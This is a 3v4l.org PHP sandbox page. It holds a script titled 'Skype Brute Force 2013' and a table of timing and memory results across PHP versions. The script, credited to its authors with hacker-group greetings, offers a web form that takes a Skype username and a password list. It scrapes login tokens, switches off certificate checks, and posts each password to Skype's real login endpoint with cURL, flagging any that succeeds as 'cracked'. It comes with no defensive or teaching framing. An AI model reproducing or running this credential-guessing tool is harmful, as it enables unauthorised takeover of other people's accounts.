3v4l.org

run code in 300+ PHP versions simultaneously
<form method='POST'> <title>Skype Brute Force 2013 By archavin</title> <center> <img src='http://www.promusicacademy.com/wp-content/uploads/2012/11/Skype-icon.png'><br> <input type='text' name='skypename' placeholder='Skype Name' size='38'><br> <textarea rows='16' cols='38' name='passwords' placeholder='passwords'></textarea><br> <input type='submit' value='Start Brute' name='brute'><br> </center> </form> <? @set_time_limit(0); # Brute Force Skype PHP Version # Coded By : xSecurity # Greets To : (( Sec4ever.CoM )) - (( x3 Group )) - (( is-sec.CoM )) $skype = "https://login.skype.com/login?application=account&return_url=https%3A%2F%2Fsecure.skype.com%2Faccount%2Flogin"; # Username & Password $username = $_POST['skypename']; $password = explode("\r\n", $_POST['passwords']); # time zone $time = date_default_timezone_set("Asia/Riyadh"); $date = date('H:i:s'); //Returns IST # header $header = "HTTP/1.1 302"; # Fucntion Detalis function xsecurity($skype) { $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, $skype); curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false); curl_setopt($ch, CURLOPT_HEADER, 1); curl_setopt($ch, CURLOPT_POST, 1); curl_setopt($ch,CURLOPT_COOKIEJAR, getcwd()."./cookie.txt"); curl_setopt($ch,CURLOPT_COOKIEFILE, getcwd()."./cookie.txt"); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); $run = curl_exec($ch); preg_match('/<input type="hidden" name="session_token" value="(.*?)"/', $run, $hash); preg_match('/<input type="hidden" name="pie" id="pie" value="(.*?)"/', $run, $piie); preg_match('/<input type="hidden" name="etm" id="etm" value="(.*?)"/', $run, $etmm); return $hash[1]."|:|".$piie[1]."|:|".$etmm[1]; } # Explode Detalis $xsec = explode("|:|" ,xsecurity($skype)); $token = $xsec[0]; $pie = $xsec[1]; $etm = $xsec[2]; # Function Brute function brute($skype,$username,$pass,$header) { $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, $skype); curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false); curl_setopt($ch, CURLOPT_HEADER, 1); curl_setopt($ch, CURLOPT_POST, 1); curl_setopt($ch, CURLOPT_POSTFIELDS, "username={$username}&password={$pass}&timezone_field=%2B03%7C00&pie={$pie}&etm={$etm}&js_time={$date}&session_token={$token}&application=account&return_url=https%3A%2F%2Fsecure.skype.com%2Faccount%2Flogin"); curl_setopt($ch,CURLOPT_COOKIEJAR, getcwd()."./cookie.txt"); curl_setopt($ch,CURLOPT_COOKIEFILE, getcwd()."./cookie.txt"); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); $brute = curl_exec($ch); if(strstr($brute, $header)) { echo "<font face='Tahoma' size='2'><center>[+] Password Cracked is <b>{$pass}</b> --> <b>{$username}</b></font></center>"; } return $brute; } if($_POST['brute']) { foreach($password as $pass) { brute($skype,$username,$pass,$header); } } echo "<center><br><font face='Tahoma' size='5' color='red'>Coded By : archavin cyberizm.org</font></center>"; ?>

Here you find the average performance (time & memory) of each version. A grayed out version indicates it didn't complete successfully (based on exit-code).

VersionSystem time (s)User time (s)Memory (MiB)
8.3.60.0110.01118.43
8.3.50.0150.00616.59
8.3.40.0140.00018.63
8.3.30.0110.00319.04
8.3.20.0030.00620.21
8.3.10.0080.00023.70
8.3.00.0070.00419.25
8.2.180.0130.00316.50
8.2.170.0110.00322.96
8.2.160.0100.00720.39
8.2.150.0030.00524.18
8.2.140.0050.00324.66
8.2.130.0050.00326.16
8.2.120.0070.00022.10
8.2.110.0060.00322.23
8.2.100.0090.00317.75
8.2.90.0080.00019.06
8.2.80.0040.00417.97
8.2.70.0030.00517.50
8.2.60.0030.00617.80
8.2.50.0040.00718.07
8.2.40.0000.00819.82
8.2.30.0030.00918.00
8.2.20.0000.00717.54
8.2.10.0040.00417.92
8.2.00.0050.00217.55
8.1.280.0140.00725.92
8.1.270.0080.00021.99
8.1.260.0040.00426.35
8.1.250.0050.00228.09
8.1.240.0030.00624.05
8.1.230.0090.00319.14
8.1.220.0080.00017.74
8.1.210.0060.00318.77
8.1.200.0070.00317.10
8.1.190.0000.00817.23
8.1.180.0000.00718.10
8.1.170.0040.00418.39
8.1.160.0000.00721.89
8.1.150.0040.00418.82
8.1.140.0050.00317.22
8.1.130.0000.00717.83
8.1.120.0040.00417.31
8.1.110.0030.00517.23
8.1.100.0000.00717.34
8.1.90.0000.00717.27
8.1.80.0000.00817.30
8.1.70.0030.00317.24
8.1.60.0080.00017.50
8.1.50.0000.00917.41
8.1.40.0050.00217.32
8.1.30.0000.00817.41
8.1.20.0040.00417.41
8.1.10.0040.00417.40
8.1.00.0000.00717.39
8.0.300.0000.00718.77
8.0.290.0000.00716.59
8.0.280.0000.00818.37
8.0.270.0000.00717.06
8.0.260.0070.00017.23
8.0.250.0000.00616.87
8.0.240.0000.00816.70
8.0.230.0040.00416.69
8.0.220.0030.00316.75
8.0.210.0050.00216.77
8.0.200.0030.00316.82
8.0.190.0040.00416.88
8.0.180.0040.00416.80
8.0.170.0030.00616.79
8.0.160.0080.00016.80
8.0.150.0030.00316.68
8.0.140.0040.00416.60
8.0.130.0030.00313.48
8.0.120.0060.00316.76
8.0.110.0000.00716.86
8.0.100.0040.00416.87
8.0.90.0080.00016.79
8.0.80.0080.00816.64
8.0.70.0000.00716.77
8.0.60.0040.00416.82
8.0.50.0040.00416.70
8.0.30.0080.01517.04
8.0.20.0110.00817.40
8.0.10.0070.00016.95
8.0.00.0100.00816.69
7.4.330.0020.00215.00
7.4.320.0070.00016.28
7.4.300.0030.00316.36
7.4.290.0030.00316.41
7.4.280.0040.00416.30
7.4.270.0000.00616.31
7.4.260.0100.00016.27
7.4.250.0040.00416.23
7.4.240.0040.00316.45
7.4.230.0070.00016.36
7.4.220.0070.01416.48
7.4.210.0110.00716.37
7.4.200.0030.00316.58
7.4.160.0140.00316.37
7.4.150.0100.00717.40
7.4.140.0090.01017.86
7.4.130.0150.00916.30
7.4.120.0080.01216.37
7.4.110.0070.01016.37
7.4.100.0100.00716.40
7.4.90.0110.00616.57
7.4.80.0110.01519.39
7.4.70.0100.01016.35
7.4.60.0130.00816.50
7.4.50.0000.00816.17
7.4.40.0100.00716.14
7.4.30.0060.01016.55
7.4.00.0040.01414.55
7.3.330.0000.00613.25
7.3.320.0060.00013.50
7.3.310.0030.00316.21
7.3.300.0000.00716.11
7.3.290.0130.00316.10
7.3.280.0110.00516.15
7.3.270.0160.00017.40
7.3.260.0120.00916.23
7.3.240.0160.00816.50
7.3.230.0120.00916.39
7.3.210.0120.00616.50
7.3.200.0060.01219.39
7.3.190.0090.00916.25
7.3.180.0060.01316.10
7.3.170.0100.00716.28
7.3.160.0190.00016.48
7.2.330.0070.01016.16
7.2.320.0090.01116.57
7.2.310.0040.01816.32
7.2.300.0130.00316.40
7.2.290.0030.01316.38
7.2.60.0000.01516.78
7.2.00.0130.00719.53
7.1.200.0060.00615.99
7.1.100.0030.01018.03
7.1.70.0000.01117.20
7.1.60.0030.02319.32
7.1.50.0100.00317.14
7.1.00.0100.07022.44
7.0.200.0030.00616.93
7.0.140.0030.07722.08
7.0.100.0100.07721.86
7.0.90.0030.07321.77
7.0.80.0070.07021.68
7.0.70.0000.05721.68
7.0.60.0100.08021.69
7.0.50.0030.08322.15
7.0.40.0030.08020.04
7.0.30.0170.07320.03
7.0.20.0030.07720.00
7.0.10.0100.07320.09
7.0.00.0030.06020.09
5.6.280.0000.07720.89
5.6.250.0070.06320.62
5.6.240.0070.06320.69
5.6.230.0100.08020.68
5.6.220.0100.07020.64
5.6.210.0070.07720.46
5.6.200.0030.07721.11
5.6.190.0030.05320.97
5.6.180.0100.08021.06
5.6.170.0000.08321.13
5.6.160.0030.04321.04
5.6.150.0000.04721.09
5.6.140.0100.05020.91
5.6.130.0030.04721.05
5.6.120.0030.04720.97
5.6.110.0070.04021.08
5.6.100.0000.04721.12
5.6.90.0030.04021.04
5.6.80.0030.03720.42
5.6.70.0000.04020.44
5.6.60.0030.04320.45
5.6.50.0100.03720.52
5.6.40.0070.07020.43
5.6.30.0030.04020.42
5.6.20.0030.03720.42
5.6.10.0000.05320.37
5.6.00.0000.04020.40
5.5.380.0070.06720.35
5.5.370.0030.06720.54
5.5.360.0030.05720.44
5.5.350.0100.08020.39
5.5.340.0000.08320.91
5.5.330.0000.07320.96
5.5.320.0030.05720.64
5.5.310.0070.08320.88
5.5.300.0130.05320.89
5.5.290.0030.04720.89
5.5.280.0070.04020.74
5.5.270.0000.05020.90
5.5.260.0000.04320.92
5.5.250.0000.04320.57
5.5.240.0000.04320.29
5.5.230.0070.04020.29
5.5.220.0030.03720.29
5.5.210.0070.03720.21
5.5.200.0000.04320.01
5.5.190.0000.04320.29
5.5.180.0130.06020.24
5.5.160.0000.04720.30
5.5.150.0030.08020.17
5.5.140.0070.04320.15
5.5.130.0070.03720.27
5.5.120.0030.04020.02
5.5.110.0030.04020.23
5.5.100.0030.04020.11
5.5.90.0030.03720.09
5.5.80.0070.04720.13
5.5.70.0030.04320.17
5.5.60.0030.03720.14
5.5.50.0000.04020.08
5.5.40.0030.04719.93
5.5.30.0070.05020.18
5.5.20.0000.04019.99
5.5.10.0000.08020.04
5.5.00.0030.05020.05
5.4.450.0030.04019.36
5.4.440.0070.04019.46
5.4.430.0070.03319.36
5.4.420.0030.04019.14
5.4.410.0030.03719.43
5.4.400.0070.03319.05
5.4.390.0030.06319.23
5.4.380.0000.06018.91
5.4.370.0030.04018.82
5.4.360.0070.07018.85
5.4.350.0100.03318.90
5.4.340.0000.04319.09
5.4.320.0000.04019.03
5.4.310.0030.03719.06
5.4.300.0030.05019.05
5.4.290.0070.03319.16
5.4.280.0030.03719.03
5.4.270.0000.04319.13
5.4.260.0030.04019.12
5.4.250.0030.06319.02
5.4.240.0000.04319.22
5.4.230.0000.03718.89
5.4.220.0030.04019.13
5.4.210.0000.04018.84
5.4.200.0000.04318.87
5.4.190.0100.03319.04
5.4.180.0070.03319.04
5.4.170.0000.04018.84
5.4.160.0000.04019.19
5.4.150.0030.07718.86
5.4.140.0100.06016.55
5.4.130.0030.07016.50
5.4.120.0070.04316.46
5.4.110.0030.07716.49
5.4.100.0000.07716.42
5.4.90.0100.05316.56
5.4.80.0030.05016.46
5.4.70.0070.05016.48
5.4.60.0030.05716.46
5.4.50.0000.07316.45
5.4.40.0030.07016.46
5.4.30.0030.07016.25
5.4.20.0100.06316.41
5.4.10.0030.07016.42
5.4.00.0000.03715.60
5.3.290.0000.04314.65
5.3.280.0000.04014.58
5.3.270.0030.03714.54
5.3.260.0000.04014.59
5.3.250.0030.04014.46
5.3.240.0070.03714.42
5.3.230.0070.07314.58
5.3.220.0000.07314.38
5.3.210.0100.06714.51
5.3.200.0100.06714.43
5.3.190.0030.07314.56
5.3.180.0070.07014.50
5.3.170.0030.07314.54
5.3.160.0030.07714.39
5.3.150.0030.05314.41
5.3.140.0030.07314.56
5.3.130.0100.05714.40
5.3.120.0070.03714.40
5.3.110.0070.06314.49
5.3.100.0070.05313.87
5.3.90.0070.06714.02
5.3.80.0030.06714.00
5.3.70.0030.06714.00
5.3.60.0030.05313.95
5.3.50.0000.07313.71
5.3.40.0030.05713.94
5.3.30.0030.07013.91
5.3.20.0000.06713.70
5.3.10.0100.06313.57
5.3.00.0000.07313.59
5.2.170.0030.06311.01
5.2.160.0000.06311.01
5.2.150.0000.04011.14
5.2.140.0030.06011.13
5.2.130.0070.05010.93
5.2.120.0030.05710.96
5.2.110.0000.06311.09
5.2.100.0030.04711.05
5.2.90.0030.06311.02
5.2.80.0000.06311.08
5.2.70.0030.05311.15
5.2.60.0000.04011.05
5.2.50.0070.05711.04
5.2.40.0030.03710.79
5.2.30.0070.05010.97
5.2.20.0000.06310.96
5.2.10.0070.05310.87
5.2.00.0070.05710.68
5.1.60.0070.05010.07
5.1.50.0030.03310.06
5.1.40.0070.04310.04
5.1.30.0000.06310.39
5.1.20.0070.05010.42
5.1.10.0000.04310.12
5.1.00.0070.05010.12
5.0.50.0100.0378.39
5.0.40.0100.0378.25
5.0.30.0000.0608.25
5.0.20.0000.0278.23
5.0.10.0030.0478.20
5.0.00.0100.0608.21
4.4.90.0000.0377.50
4.4.80.0000.0307.50
4.4.70.0000.0277.50
4.4.60.0070.0277.50
4.4.50.0000.0207.50
4.4.40.0030.0507.50
4.4.30.0000.0377.50
4.4.20.0000.0377.50
4.4.10.0000.0277.50
4.4.00.0000.0377.50
4.3.110.0000.0337.50
4.3.100.0000.0277.50
4.3.90.0000.0377.50
4.3.80.0070.0477.50
4.3.70.0000.0277.50
4.3.60.0000.0377.50
4.3.50.0000.0307.50
4.3.40.0100.0477.50
4.3.30.0030.0337.50
4.3.20.0000.0277.50
4.3.10.0000.0407.50
4.3.00.0030.0337.50

preferences:
46.62 ms | 400 KiB | 5 Q